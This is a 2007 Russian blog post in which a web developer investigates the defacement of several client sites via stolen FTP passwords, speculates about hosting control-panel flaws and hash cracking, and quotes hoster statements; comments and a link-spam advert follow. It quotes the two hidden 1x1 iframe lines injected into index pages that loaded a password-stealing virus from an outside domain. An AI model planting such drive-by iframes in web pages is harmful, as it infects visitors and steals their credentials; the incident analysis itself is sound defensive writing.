?

Log in

   Journal    Friends    Archive    Profile    Memories
 

собираю все свои мысли по поводу взлома сайтов - Сбор жизненных багов


мар. 22, 2007 03:30 pm собираю все свои мысли по поводу взлома сайтов

Итак, отшумели звонки в офис по повду голых баб на сайтах, пришло время трезво взглянуть на произошедшее.


1) Что же все таки случилось?
В одно прекрасное утро на нескольких сайтах на главных страницах(и не только) появились голые бабы. На уровне HTML кода это выглядело следующим образом:

<ифрейм src='http://lem0n.info/km/ya.php' width=1 height=1><ифрейм>
<ифрейм src='http://lem0n.info/km/love.htm' width=1 height=1><ифрейм>


вот такие строчки были вставлены в index.php, indexhtm, index.html
При загрузке такой странички у вас пытался грузится вирус (благо нортон антивирус его не пропускал) и по мимо нормального контента сайта грузились голые бабы во всевозможных позах.

2) Как взломали сайты?
Меня сразу напрягло то что была правка файлов на фтп. Может сломали нашу систему администрирования? Ан нет, не все так просто - был взломан проект, который весь был свёрстан в HTML и никакого PHP там в помине не было. К тому же CHMOD везде стоял 644 а значит править файлы мог либо владелец, либо root. Ладно, копаемся дальше.

3) Кто взломал сайты?
Запросили логи и мастерхоста по заходам на площадки по фтп в ту "вальпургиеву ночь". Был обнаружен некий IP адрес , с которого был заход на фтп - 84.252.148.70, это IP адрес привязан к домену SPORT.MCHOST.RU. Ага, значит root тут не причём. Заходим на http://mchost.ru/ и обнаруживаем какой-то абсолютно левый хостинг, у которого в место контактов - мыло, аська а способы оплаты - яндекс деньги , то есть местоположение данного хостинга даже со спутника вряд ли пеленгуется. Нехитрые размышления наводят на то, что этот сервер просто был взломан и использовался как площадка для атаки, хостер конечно же этого никогда не признает , а занчит и логов никаких не даст - всё, концы вводу, наш хацкер в не зоны досягаемости. Возвращаемся к размышлениям о том как взломали сайты.

4) Как взломали сайты? - Часть вторая
Из логов мастерхоста видно что был заход по фтп на плащадку - а значит кто-то знал пароли. Подобрали пароль? ... не, не вариант. Сразу же в голову пришла мысль о вирусах , которые ищут пароли на локальном компе и отсылают их куда нибудь. Начинаю матерится на всех , что блин храните пароли хрен знает где и т д. И вроде бы все - дело раскрыто ... но , не все так просто как оказалось. Меня тревожил вопрос по поводу того, что были взломаны много сайтов , а человека который бы одновременно знал все эти пароли что то в памяти не находилось... что -то тут было не так. Пошёл гуглить и с удивлением обнаружил что мы не одни такие... и не то что не одни.. а прошла целая волна таких взломов. Тут обсуждение деталей проблемы
Выводы напрашиваются такие: раз серия подобных взломов массовая - дело не тольк в вирусах, которые рассылают пароли, а дело ещё и в хостерах (Ну не могли же все попастся на тот вирус). как можно взломать хостера и узнать пароли на фтп ? Конечно по-разному.. но вряд ли это был взлом FreeBSD (дырок во фряхе мало и они быстро патчутся, настройка фряхи на мастерхосте была уж наверное нормальная надо думать) . Я полностью согласен с людьми которые думают что это был взлом контрольной панели. Всё сходится - у контрольной панели есть доспут к паролям на фтп (т к с помощью неё их можно менять) стало быть с помощью какого то хитрого запроса можно получит как минимум список хешей паролей ( а может и сами пароли). К тому же был взлом многих хостеров - а значит они все имеют одну и ту же уязвимость в контрольной панели. Конечно же ни мастерхост ни другие хостеры никогда не признаются об этом, но некоторые их высказывания на тему взломов подтверждают теорию о том , что была взломана контрольная понель. Вот к примеру:
Valuehost

Что сделано нового сейчас:
+ введена новая безопасная система авторизации по FTP;
+ используется новый алгоритм хранения паролей FTP для защиты от взломов;
+ введена возможность быстрой смены паролей на FTP в меню панели управления "Управление FTP-логинами";
+ введено понятие "период устаревания" пароля;
+ введена функция в панели управления по установке количества дней устаревания нового пароля;
+ введена функция блокировки доступа по FTP, если Вы не собираетесь долго обновлять сайт.
(взято отсюдо)

новый алгоритм хранения паролей, функция устаревания паролей - всё это для того что бы обезопасить получение паролей с помощью перебора - ага , значит кто то все таки имел возможность перебирать пароли
введена функция блокировки доступа по FTP, если Вы не собираетесь долго обновлять сайт - добило окончательно.. значит они не смотря на все меры они не могут гарантировать полную защиту пароля на фтп и предлагают мне в целях безопасности вообще вырубить фтп доступ

Мастерхост конечно не стал палится такими высказываниями, но факты взлома подтверждают то что и у него наблюдаются подобные проблемы
Конечно же нужно понимать что изначально проблема в софте который установлен в качестве контрольной панели, но хостер все равно не прав. Не прав он в том что не заморочился над разработкой собственной контрольной панели, а если и заморочился - то плохо защитил её.

Да, кстати , тот вирус что пытался грузится со взломанных сайтов - он действительно находит и рассылает пароли с вашего компа :) У нас так были взломаны 2 фтп-акаунта на наш рабочий сервер на котором конечно же отсутствует любая контрольная панель, и в логах достпа нет попытки перебора паролей на фтп. Так что всё же свои компы тоже нужно защищать и более тщательно хранить пароли (уж точно не в тотал командере)

5) Итог
А итог плачевный... если уж агава и мастерхост были подвержены взлому, то что говорить о других хостерах. Остаётся надеяться и верить что хостеры заморочатся над своими контрольными панелями и сделают соответствующую защиту а люди в свою очередь будут более тщательно хранить свои пароли и защищаться от вирусов

UPD : натнулся на официальное высказывание мастерхоста по этой проблеме :

"28.02.07. Волна хищений FTP-паролей с компьютеров пользователей
Уважаемые клиенты!
Специалистами службы технической безопасности компании .masterhost за последние дни было зафиксировано резкое увеличение случаев хищения реквизитов FTP-доступа с компьютеров пользователей.Велика вероятность того, что это целенаправленные волновые атакитроянских программ или вирусов, которые осуществляют различные несанкционированные вами действия.Наши специалисты совместно с компаниями-партнерами,специализирующимися на решениях по информационной безопасности, активно изучают зловредный трафик с целью локализации очага вредоносных атак.Для снижения риска инфицирования вашего компьютера также советуемвам своевременно осуществлять обновление антивирусного ПО, в том числе антивирусных баз.В случае подозрений, что целостность ваших данных была нарушена и какие-либо данные могли быть использованы посторонними лицами, оперативно измените пароль FTP-доступа к вашим ресурсам и обязательно проверьте ваш персональный компьютер свежим антивирусным ПО."


Вот так вот, что и требовалось доказать. "зафиксировано резкое увеличение случаев хищения реквизитов FTP-доступа с компьютеров пользователей" , звучит даже как то смешно...

9 комментариев - Оставить комментарийPrevious Entry Поделиться Next Entry

Comments:

От:yariktech
Дата:Март 22, 2007 01:34 pm
(Ссылка)
Слушай, хорошее расследование! )))
Т.е. все это реально и под силу, но сам же понимаешь, всем впадлу! Мало людей, которые реально парятся за безопасность...

Кстати, на воркстейшнах еще желательно снимать кеширование паролей. А то можно просто тырить файлик один умный, удаленно логиниться и прочее, если у тебя политика безопасности позволяет...

Вообще тема паролей уже надоела... Пора переходить на другой уровень. (((
От:realdo
Дата:Март 22, 2007 02:25 pm
(Ссылка)
спасибо ))

а другой уровень защиты - это только когда ты хостишь свои проекты на своём сервере и всё, но это большой геморой.
Все все виртуальные хостинги слабозащищенные как показывает практика ((
От:yariktech
Дата:Март 23, 2007 10:39 am
(Ссылка)
Но это же, черт возьми, их проблема! Точнее проблемы у нас, а упущение их! Надо просто писать заявы куда-нить, чтобы уровень безопасности поднимали и это контролировалось при регистрациях... Но это все глобальные мысле на уровне "как запретить продавать не лицензионное ПО" ха-ха-ха! Аж сам засмеялся! ))))))))))))
От:_caspy
Дата:Март 23, 2007 07:21 am
(Ссылка)
Вы правда предполагаете, что, например, у .m пароли хранятся в нехешированном виде? :)
От:realdo
Дата:Март 23, 2007 09:14 am
(Ссылка)
а с чего Вы взяли что я такое полагаю? Естественно в хешированном. Я сказал что "с помощью какого то хитрого запроса можно получит как минимум список хешей паролей ( а может и сами пароли)." Ну а получив список хешей методом перебора тот же MD5 ломается без особых проблем, учитывая что у мастерхоста уж и не таки длинные пароли. А про "сами пароли" я написал из-за того, что я точно не знаю как хранит пароли контрольная панель, может она использует алгоритм шифрования с ключом(типа RSA какой нить), тогда если стащить ключ - можно сразу список хешей перевести в список паролей. Хотя я понимаю, что так хранить пароли - бред, но к сожалению сталкивался с примерами когда люди так хранят пароли.
От:_caspy
Дата:Март 23, 2007 10:05 am
(Ссылка)
Сложилось такое впечатление по тексту. :)
Ну а по делу, - хешированные. Раз и навсегда. :)
От:realdo
Дата:Март 23, 2007 11:00 am
(Ссылка)
Раз уж Вы из мастерхоста, то можно поинтересоваться следующим вопросами.
Под каким юзером запускается пхп, который обрабатывает контрольную панель? По идее он должен запускатся под юзером, который входит в панель управления что бы физически не иметь доступа к данным других юзеров.

И ещё.Запуск php не в сейф-моде на сервере при отсутствии специальных мер по разграничению юзеров - дырка в безопасности. Но сделать такое разграничение довольно сложно. Подружить такое разграничение юзеров с какой-либо готовой панелью управления - дело из разряда фантастики, учитывая то что каждый хостер делает разграничение, основываясь на каких то своих собственных алгоритмах.Писать самим панель управления для себя - дело долгое и дорогое, при этом ведь её нужно постоянной обновлять и фиксить баги. Какой решение данной проблемы Вы нашли для себя?

Возможно я спрашиваю вопросы из разряда "внутрикорпоративная информация", но наверное многим людям(являющихся вашими клиентами) , которые на падают в обморок от слова "chroot", было бы интересно узнать подобную информацию.
От:(Anonymous)
Дата:Август 29, 2007 04:07 pm
(Ссылка)
ээээээээээ...батенька...мсхост ддосил=)
От:(Anonymous)
Дата:Январь 14, 2008 09:44 pm

Реклама и тематические рассыллки, продвижение

(Ссылка)
Здравствуйте!

Предлагаем вашему вниманию наши услуги по рекламе на форумах. Мы в кратчайшие сроки организуем вам рассылку, от которой вы получите максимальную отдачу.

В данный момент возможна работа по двум схемам:
1) Вы продвигаете какую-либо услугу, либо продукт. Вам нужны исключительно тематические посетители с форумов. Тогда мы организуем рассылку по ресурсам, которые посещают люди, которые увидят вашу рекламу.
2) Вам нужны беки в поисковиках для раскрутки интернет-проектов. Тогда мы делаем рассылку на все ресурсы, на которых можно оставить ссылку (блоги, гостевые книги).

В зависимости от выбранной схемы, вы получите ожидаемый результат. По окончанию рассылки будет сформирован и предоставлен отчёт из ресурсов, на которых опубликован ваш рекламный текст.
Это не является спамом. Это-тематическая реклама именно в тех местах и разделах, которые предназначены исключительно для неё.

Подробности в ICQ 397908911